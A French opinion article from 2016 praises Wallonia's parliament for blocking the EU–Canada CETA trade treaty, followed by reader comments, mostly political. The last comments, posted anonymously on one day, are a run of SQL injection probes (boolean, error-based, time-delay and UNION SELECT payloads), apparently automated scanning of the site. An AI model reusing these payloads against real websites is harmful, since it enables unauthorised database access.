Les Wallons, l’honneur de l’Europe

le 26 octobre 2016

Le président du Parlement européen Martin Schulz (à droite) et le chef du gouvernement de la Wallonie, Paul Magnette, à Bruxelles le 22 octobre 2016

Parce qu’il refuse que la démocratie soit bafouée et qu’une justice privée des affaires sacrifie les droits sociaux, humains et environnementaux au nom du « libre-échange », le courageux Parlement de Wallonie est cité à comparaître devant le grand tribunal de la pensée conforme. Il paraît qu’un si petit peuple devrait se taire. Rien de tel évidemment quand le Luxembourg empêche toute harmonisation fiscale ou quand l’Estonie bloque certains droits sociaux.

En lavant l’affront fait aux centaines d’organisations européennes qui depuis des mois tentent d’alerter sur les dangers d’un traité présenté comme intouchable, la Wallonie rend un fier service à la démocratie et à l’idée européenne. Son refus fait tache d’huile : en Espagne, en Allemagne, en Grèce, de plus en plus nombreux sont les opposants à cette inquiétante mode du libre-échangisme autoritaire, paravent de la guerre économique.

Les gouvernements s’affolent et ils ont bien raison. Si les Parlements européens s’étaient prêtés au même exercice que leurs voisins wallons, en décortiquant le texte, en sollicitant l’avis d’associations et syndicats, il est probable que les conclusions eussent été les mêmes. C’est qu’en matière de libre-échange, mieux vaut maquiller les pires régressions du fard de la simple gestion et du secret des affaires que d’assumer un désaveu populaire massif.

Contrairement à ce que disent ses promoteurs, le Ceta n’est pas un simple traité sur le commerce, mais un texte qui entend remodeler l’économie, les services publics, le droit social et environnemental. En créant une « cour pour l’investissement », il met en place une justice d’exception faite pour et par les multinationales contre les souverainetés populaires. En supprimant la quasi-totalité des droits de douane agricoles, il prévoit de faire de l’agriculture, notamment française, une « réserve d’Indiens ». En nivelant par le bas les normes environnementales, il contrevient aux engagements pris la main sur le cœur lors de la conférence de Paris sur le climat, il y a tout juste un an, et balaie le principe de précaution inscrit dans le droit européen.

L’opposition à ce traité n’est dirigée ni contre nos amis canadiens, qui subissent déjà les terribles effets du traité de libre-échange nord-américain, ni contre le commerce, mais contre un remodelage du monde aux canons du nouveau capitalisme mondialisé.

Si les multinationales et leurs actionnaires ont tout à pâtir d’un rejet, les peuples et les travailleurs des deux rives de l’Atlantique ont, eux, tout à gagner d’une discussion large et ouverte sur les échanges commerciaux afin de définir souverainement une mondialisation égale et solidaire. Le moment est venu d’abandonner le projet transatlantique et le traité de libéralisation des services, eux aussi discutés dans le plus grand secret. Les dirigeants européens se grandiraient et rendraient service à l’idée européenne en cessant leurs pressions et leurs ultimatums. Voilà qui serait nouveau ! Pour y parvenir, les débats publics, l’information et la mobilisation doivent encore s’élargir.

44 commentaires


Giovanna Cannas 26 octobre 2016 à 20 h 42 min

REFERENDUM!!!!!!!!!

gerstein micheline 27 octobre 2016 à 16 h 01 min

non ils ont raison et leur clairvoyance devrait faire réfléchir nos gouvernants

GALLIEZ 27 octobre 2016 à 7 h 13 min

BRAVO AUX WALLONS et à Mr MAGNETTE! COURAGE Encouragements des Français, face à la meute de corrompus qui veunet s’enrichir en nous vendant les saloperies polluées du CANADA er des USA!

Ginette Therrien 27 octobre 2016 à 22 h 32 min

Heureusement que la Wallonie existe, voilà de vrais politiciens honnêtes qui travaillent pour le peuple et non pas pour les multinationales.Ne comptez pas sur les politiciens du Canada pour donner l’heure juste, nous ignorons complètement en quoi cet accord consiste grâce à Trudeau et Couillard. Chanceux les Wallons.

Christian Grande 31 octobre 2016 à 0 h 17 min

En effet, on peut remercier Monsieur Magnette pour son expression libre allant contre la courant de pensée dominant dans les instances européennes, qui non seulement ont donné aux entreprises internationales la possibilité de se délocaliser (libre circulation des capitaux), de recourir à de la main d’œuvre bon marché (pays de l’Est) mais aussi de faire revenir les productions ainsi rendues compétitives, vers notre marché intérieur où le prix normal leur assure des marges substantielles, permettant de satisfaire les actionnaires. Le directive Bolkestein, permet à de nombreux secteurs (btp, transports) de disposer d’une main d’œuvre détachée dont les charges sociales, bien qu’ils travaillent par exemple en France, restent calculées sur celles de leur pays d’origine et donc permettent là aussi une meilleure compétitivité , laissant des travailleurs français au chômage. Ajoutons, que le Luxembourg (et quelques autres pays européens) ont conclu des rescrits fiscaux avec des entreprises internationales, qui tout en faisant leur chiffre d’affaire en France, en Allemagne ou ailleurs dans l’Europe, arrivent par des combinaisons juridiques à rapatrier leurs bénéfices, très diminués par diverses charges souvent fictive (licences etc…) et à ne payer pratiquement pas d’impôts. Alors que l’Europe avance comme grand principe que l’Etat ne fausse pas le jeu de la concurrence, ce genre de rescrits fiscaux légaux mais secrets (N’est-ce pas Monsieur Juncker !) constitue si on l’analyse logiquement une aide de l’Etat qui conclut ces accords et fausse la concurrence en avantageant certaines entreprises au dépend d’autres qui elles payent un impôt bien plus conséquent là où elles réalisent leur chiffre d’affaire. C’est tout ce système européen qui détruit nos industries depuis des années et qui fait grossir le rang des chômeurs en France et dans d’autres pays européens. Et comme si cela ne suffisait pas, les accords de libre échange, se concluent à droite et à gauche, sans même une étude d’impact sur l’économie des partenaires et sans installer un système juridique indépendant avec des magistrats indépendants pour trancher les litiges que les investisseurs étrangers ne manqueront pas de déclencher si une décision du pays constitue pour eux un obstacle à leur activité économique, dont ils demanderont réparation à l’Etat !! Et nos dirigeants, complices de ces investisseurs vont même jusqu’à magouiller dans la Commission européenne de l’Assemblée, pour repousser un projet d’amendement qui fort logiquement demandait que le traité Céta ne s’applique pas provisoirement, tant que les parlements nationaux n’avaient pas validé le traité, laissant une période de deux ou trois ans sans véritable protection contre des investisseurs qui ne manqueront pas d’invoquer leur préjudice, lié à quelque réglementation nationale trop contraignante…. Les investisseurs étrangers auront donc un pouvoir que l’on peut qualifier d’exorbitant, dont ne dispose pas les citoyens ou entreprises nationales avec une justice spécifique arbitrale privée !!

Lalanne 31 octobre 2016 à 1 h 16 min

Liberté, Égalité, Fraternité ? Ben non, c’est trop ringard !
Rentabilité, Inégalités, Vénalité ! Voilà les nouvelles valeurs au top !

Quand les peuples se réveilleront, les pouvoirs économiques auront déjà TOUS les pouvoirs. Il n’y aura plus d’États (ils sont déjà tellement amoindris, appauvris, bientôt exsangues comme la Grèce, les gouvernants étant à la solde des multinationales), il n’y aura plus de Justice, les seuls droits seront l’apanage des puissants, les droits régaliens n’existeront plus, les tribunaux seront tous privés (ça commence déjà !) les armées et les polices ne seront plus constituées que de mercenaires etc. Bref, on revient au Moyen-Age : tout le travail fait depuis Louis XI sera mis à sac.

pellizzoni 1 novembre 2016 à 15 h 07 min

les citoyens dans tout cela ont leur mot à dire, mais on ne les consulte pas, que peut on faire pour que l’on nous écoute, les pétitions ont été signées contre le Ceta mais il est déjà trop tard car un accord à été fait , quelle est la possibilité pour se faire entendre

Joëlle Philip dumont5 2 novembre 2016 à 9 h 19 min

Merci de nous avoir éclairé sur ce point,

Ce n est pas tant un manque d information qu’ un manque de courage’ qui fasse que l on se taise et que l on accepte
,malheureusement ‘ la France est figée
Les exemples viennent d ailleurs ‘ depuis quelques annees’
L Islande,,,la Grece »’ L Espagne » etc,,,
Nous nous sommes endormis’
‘les grèves interminables(s n c f) ‘le refus( compréhensible) de fermer des centrales(dangereuses )rendent impopulaires les actions des syndicalistes  »’une France figée par les divisions ‘
DiViser pour regner »’J ai mal à la France »’

GALLO 2 novembre 2016 à 19 h 01 min

Voilà pourquoi il faut un représentant du PC à la présidentielle. Pour que les médias soient obligés d’entendre et de diffuser le point de vue du PC. Un ralliement avant le premier tour est toujours possible. Un sympathisant.

alain harrison 3 novembre 2016 à 4 h 33 min

Les Wallons, non un représentant bien placé du gouvernement, le meilleur homme pour protéger les intérêts de la Belgique qui utilise le procédé, vous savez le chapitre 11 de l’ALENA, encore utilisé.

Nous voyons des revendications à la carte, rien à voir avec un réel changement des contrats financiers actuels, ce n’est pas des ententes entre pays, mais des contrats (armada d’avocats) entre pays et multinationales, pour protéger les contrats en faveur des compagnies et leurs futures profits qu’ils prennent soins d’optimiser, ce sont des visionnaires, les entrepreneurs..
Voyez-vous la fourberie ? Si vous êtes un peu attentif des PUB à la TÉLÉ, il nous le serve leur don de visionnaire.
Et oui, répétez un mensonge suffisamment et il deviendra vérité.
Maintenant le chantre entrepreneurial nous chante: une PUB:je vais démocratiser l’eau, jeune individu entrepreneur qui nous prend pour des attardés, comme si l’eau n’était pas du domaine publique, hum la France ? Et maintenant, ils nous vendent le don de la bonne aventure: ils prévoient selon leur calcul magique, les profits à venir. Il faut le faire, et être fourbe en maudit. Oui, une chose est sûr, la science financière, en plus d’être un casino, est de plus en plus magique: voir l’avenir. Les gouvernements ont à bien se tenir, car derrière tout magicien se cache le feu du dragon . Le Moyen-Orient, ça vous dit quelque chose, la Grèce, et maintenant l’ensemble des pays progressistes de l’Amérique latine.

La gauche, le capital ou la cotisation, la finance virtuelle ou l’économie réelle.
Mais qu’est-ce que l’économie ?
Posons-nous là cette question, mais pour cela, il faut sortir des méandres des théories…..
C’est quoi l’économie ?

alain harrison 3 novembre 2016 à 5 h 00 min

En passant Marx n’a pas inventé l’économie communiste, il a fait la critique et le démontage de l’économie capitaliste en montrant sa vraie nature: le stratagème de l’exploitation de l’homme par l’homme, vieux comme, depuis que l’homme (hominisation oblige) ÉCRIT SON HISTOIRE, selon le vainqueur de la guerre.
D’autres communistes soi-disant, Lénine fut probablement le dernier vrai communiste, Staline est d’une autre nature, et toute la douma qui s’en suivit.
Nous devons refaire nos devoirs, mais cette fois-ci en dehors de votre formatage idéologique, qui n’en doutez-pas sacrifiera une nouvelle fois les populations. L’outil ou l’identité ????
Le Chili d’Allende, Cuba, le Chavisme et la Bolivie et ci. sont les premières vraies tentatives pour une alternative à l’exploitation et l’esclavagisme moderne hautement sophistiqué. Beau coup de syndicats ressemblent plus à des geôliers que d’autres choses.
Je pense au formidable potentiel du Fond FTQ au service de quelque exploiteur enrichit grâce au fond, et depuis la Commission Charbonneau, le Fond FTQ est passé aux mains de qui ???? Alors que le fond aurait pu servir aux coopératives.

La gauche, quand cessera-t-elle d’échapper les potentiels ?!
Le potentiel des sorties, bien sûr il y aura crise, le potentiel de la crise profitera à qui (?), regardez la fameuse crise du Brexit. La crise, c’est la Grèce qui en paie le prix.

Comment est venu cette crise? Qui aide qui?

Les juncker et ci, leur place est derrière les barreaux. Ha oui, les Hollande et ci…..

Au Québec, un charest a des comptes à rendre…….enquêtes enquêtes sabordées

alain harrison 3 novembre 2016 à 5 h 02 min

Il y a pas à dire, nous sommes tous dans le même bateau, les mêmes RAM MAUDUS OPERANDI et leurs variantes.

alain harrison 3 novembre 2016 à 22 h 51 min

Bonjour.

«« Les dirigeants européens se grandiraient et rendraient service à l’idée européenne en cessant leurs pressions et leurs ultimatums. »»

Cessons de rêver.
Cessons de penser que….
Cessons les arguments du on peut………réformer……de jouer à ce jeu.
Cessons de leurrer.
La preuve faite et refaite commence à peser de plus en plus lourd sur le plan psychologique: résignation acquise.
C’est le temps de se brancher.

S’ils font pressions et jouent des ultimatums, c’est qu’ils ont épuisé leur subtilité !?

Non, ils continuent leurs pressions et ultimatums d’un côté, et d’un autre plus subtile, des armadas commencent à nous chanter l’économie du partage, l’économie circulaire…..du libéralisme.
Mais il faut bien comprendre en quoi consiste ces économie du libéralisme. De l’engineering
des mots. On va encore se faire avoir comme ça longtemps. (les principes du conditionnement-manipulation).

J’ai même remarqué une PUB qui utilisait le concept du « OUI mais ». Et oui.

Je vous le dit, ils sont tordus, sans foi ni loi, leur seul valeur: le profit.
Ils veulent notre bien, et effectivement ils l’obtiennent.
Ils ont les moyens de soudoyer la recherche fondamentale en psychologie.
Voir et revoir Les enfants de la sur consommation
https://www.youtube.com/watch?v=2_toC3AYsj8

Crime contre les enfants !?

Avez-vous remarquer les contradictions de la politique de responsabilité individuelle liée à la dérèglementation (pour les uns seulement $$$$).
Les google et ci. nous suivent à la trace pour faciliter notre navigation, soi-disant.
Je n’ai pas besoin de cette aide factice…Nous prennent-ils pour des demeurer, ou quoi.
Et puis c’est un crime de suivre quelqu’un sans son consentement éclairé, ce qui n’est pas réalisé, tellement leur page de consentement est labyrinthique. Et longue à lire, n’est-ce pas !

Il va falloir mettre de l’ordre là-dedans.

Internet est un droit fondamental, ceux qui le gèrent un privilège, pas le contraire.
Le politicien, le juge , l’avocat, toute personne associée (personne morale) à la gérance d’internet,qui ne reconnaît pas ceci, et bien doit être mise à l’écart et perdre le privilège de toute influence.

Il faut remettre les pièces à l’endroit, à commencer par règlementer la dérèglementation en attendant ….Faut bien rêver.
Non L’UE n’est pas réformable. Si ce n’est pas rendu évident, il y a de la malhonnêteté dans l’aire……….

Anonyme 29 novembre 2016 à 20 h 31 min

MdJP AND 8210=8996– idBl

Anonyme 29 novembre 2016 à 20 h 31 min

MdJP) AND 7830=CAST((CHR(113)||CHR(120)||CHR(112)||CHR(118)||CHR(113))||(SELECT (CASE WHEN (7830=7830) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(98)||CHR(107)||CHR(118)||CHR(113)) AS NUMERIC) AND (9270=9270

Anonyme 29 novembre 2016 à 20 h 31 min

MdJP AND 2239 IN (SELECT (CHAR(113)+CHAR(120)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2239=2239) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(118)+CHAR(113)))– apGY

Anonyme 29 novembre 2016 à 20 h 32 min

MdJP);SELECT PG_SLEEP(5)–

Anonyme 29 novembre 2016 à 20 h 32 min

MdJP’);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(105)||CHR(85)||CHR(116)||CHR(84),5) FROM DUAL–

Anonyme 29 novembre 2016 à 20 h 32 min

MdJP AND 9498=(SELECT 9498 FROM PG_SLEEP(5))

Anonyme 29 novembre 2016 à 20 h 32 min

MdJP AND 9671=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(101)||CHR(97)||CHR(88),5)

Anonyme 29 novembre 2016 à 20 h 33 min

MdJP) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL– WQYi

Anonyme 29 novembre 2016 à 20 h 33 min

MdJP) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(‘qxpvq’,’EuwVoGoOXL’),’qbkvq’)– Zqzp

Anonyme 29 novembre 2016 à 20 h 33 min

-1183) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(‘qxpvq’,’uKcDMmGUWlXbWZyoVsnIjiPFvNvXAKEDZGmuJYYo’),’qbkvq’)– Ayjh

Anonyme 29 novembre 2016 à 20 h 33 min

-5652) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(CONCAT(‘qxpvq’,’jyPDsjfOox’),’qbkvq’),NULL,NULL– BpiQ

Anonyme 29 novembre 2016 à 20 h 34 min

MdJP) UNION ALL SELECT 84,84,84,84,84,84,CONCAT(CONCAT(‘qxpvq’,’kTUrFJoErp’),’qbkvq’)– pvTH

Anonyme 29 novembre 2016 à 20 h 34 min

-8248) UNION ALL SELECT 84,84,84,84,84,84,CONCAT(CONCAT(‘qxpvq’,’FFMFyWTwFQ’),’qbkvq’)– tEgw

Anonyme 29 novembre 2016 à 20 h 34 min

MdJP UNION ALL SELECT NULL,NULL,NULL,NULL– Mqee

Anonyme 29 novembre 2016 à 20 h 35 min

MdJP UNION ALL SELECT NULL,NULL,CONCAT(CONCAT(‘qxpvq’,’UgaGjJetgYhmeGdeqKcwSCnBuldULNVjfwsikbpq’),’qbkvq’),NULL– AGCM

Anonyme 29 novembre 2016 à 20 h 35 min

-9875 UNION ALL SELECT CONCAT(CONCAT(‘qxpvq’,’knsNjpTaCaBMtOWBdNSgwDgnabbRuALHhaiUflij’),’qbkvq’),NULL,NULL,NULL– plLy

Anonyme 29 novembre 2016 à 20 h 35 min

MdJP’) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL– HUxh

Anonyme 29 novembre 2016 à 20 h 35 min

MdJP’) UNION ALL SELECT CONCAT(CONCAT(‘qxpvq’,’dcccbdSAiAUgZWagDvHrXqJXoHNdBawUvyhXeBRh’),’qbkvq’),NULL,NULL,NULL,NULL,NULL– NhBy

Anonyme 29 novembre 2016 à 20 h 36 min

-9156′) UNION ALL SELECT CONCAT(CONCAT(‘qxpvq’,’PzVPufaYDHJgCPPsKXKBunhVkVpthurRupdOGKgY’),’qbkvq’),NULL,NULL,NULL,NULL,NULL– fjVb

Anonyme 29 novembre 2016 à 20 h 36 min

-6006′) UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(CONCAT(‘qxpvq’,’mwfPhQgWkv’),’qbkvq’),NULL– EPzJ

Anonyme 29 novembre 2016 à 20 h 36 min

MdJP’ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL– QXhi

Anonyme 29 novembre 2016 à 20 h 36 min

MdJP’ UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT(‘qxpvq’,’iwwxHKafak’),’qbkvq’),NULL,NULL,NULL,NULL– zqpR

Anonyme 29 novembre 2016 à 20 h 37 min

-6682′ UNION ALL SELECT CONCAT(CONCAT(‘qxpvq’,’GjSeFbdJUreUwDrzmVvwCdbaiOOjxDewRFEUWSnd’),’qbkvq’),NULL,NULL,NULL,NULL,NULL,NULL,NULL– zeEE

Anonyme 29 novembre 2016 à 20 h 37 min

-6261′ UNION ALL SELECT NULL,NULL,CONCAT(CONCAT(‘qxpvq’,’XnAjQpHWfi’),’qbkvq’),NULL,NULL,NULL,NULL,NULL– hJZR

Anonyme 29 novembre 2016 à 20 h 37 min

MdJP%’ UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL– fXLg

Anonyme 29 novembre 2016 à 20 h 37 min

MdJP%’ UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT(‘qxpvq’,’nOIZGCzFQppmNMjSZqMvygYLgWNxLqnlSYuEOZBa’),’qbkvq’),NULL,NULL,NULL– HqAH

Anonyme 29 novembre 2016 à 20 h 38 min

-5581%’ UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT(‘qxpvq’,’LCEXFkjofRNhbdmsiqhtRrrUEBCZNjygThMmWIvQ’),’qbkvq’),NULL,NULL,NULL– aIhh

Anonyme 29 novembre 2016 à 20 h 38 min

-6314%’ UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(CONCAT(‘qxpvq’,’ucfhYHVFhB’),’qbkvq’),NULL,NULL– sUJr

Anonyme 29 novembre 2016 à 20 h 38 min

MdJP UNION ALL SELECT NULL,NULL,NULL,CONCAT(CONCAT(‘qxpvq’,’nZCwihsVlj’),’qbkvq’),NULL,NULL,NULL,NULL,NULL,NULL– klSD

Anonyme 29 novembre 2016 à 20 h 39 min

-3708 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT(‘qxpvq’,’PyjpHTPQLfEYmzrvyWmsYqUCesmzIIJfbdJPEscm’),’qbkvq’),NULL,NULL,NULL– CyOU

Anonyme 29 novembre 2016 à 20 h 39 min

-8574 UNION ALL SELECT NULL,CONCAT(CONCAT(‘qxpvq’,’TcWjfERVMI’),’qbkvq’),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL– nuUc

Répondre à GALLO Annuler la réponse

Commentaire

Nom *

Les champs marqués * sont obligatoires

Email *

Votre adresse de messagerie ne sera pas publiée.

Restez en contact

Inscrivez-vous à la newsletter